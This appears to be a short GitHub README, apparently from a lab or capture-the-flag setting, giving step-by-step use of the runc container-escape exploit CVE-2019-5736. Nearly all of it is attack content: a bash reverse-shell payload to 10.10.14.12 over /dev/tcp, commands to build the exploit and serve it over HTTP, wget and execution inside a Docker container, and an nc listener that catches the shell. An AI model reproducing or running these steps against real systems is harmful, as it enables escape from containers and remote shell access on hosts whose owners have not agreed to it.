Skip to content

Latest commit

 

History

History
44 lines (25 loc) · 1.25 KB

README.md

File metadata and controls

44 lines (25 loc) · 1.25 KB
Raw

🖥️ -k4u5h41- #️⃣ CVE-2019-5736

Usage :

machine is vulnerable to CVE-2019-5736, follow steps in Runc exploit (CVE-2019-5736). Download file main.go, change the payload in the file into:

  var payload = "#!/bin/bash \n bash -i >& /dev/tcp/10.10.14.12/1234 0>&1"

After that, run:

  go build main.go

Host a http server :

  python3 -m http.server

image

Then open 3 Terminals as below :

image

Terminal 1
  sudo /usr/bin/docker exec -it webapp-dev01 /bin/bash
  wget http://10.10.14.12/main
  chmod +x main
  ./main

Terminal 2
  sudo /usr/bin/docker exec -it webapp-dev01 /bin/sh

Terminal 3
  nc -nlvp 1234

once you run the ./main in the first ssh terminal immediately run second command in the second ssh terminal, then you will get the netcat reverse shell in the terminal 3

image

image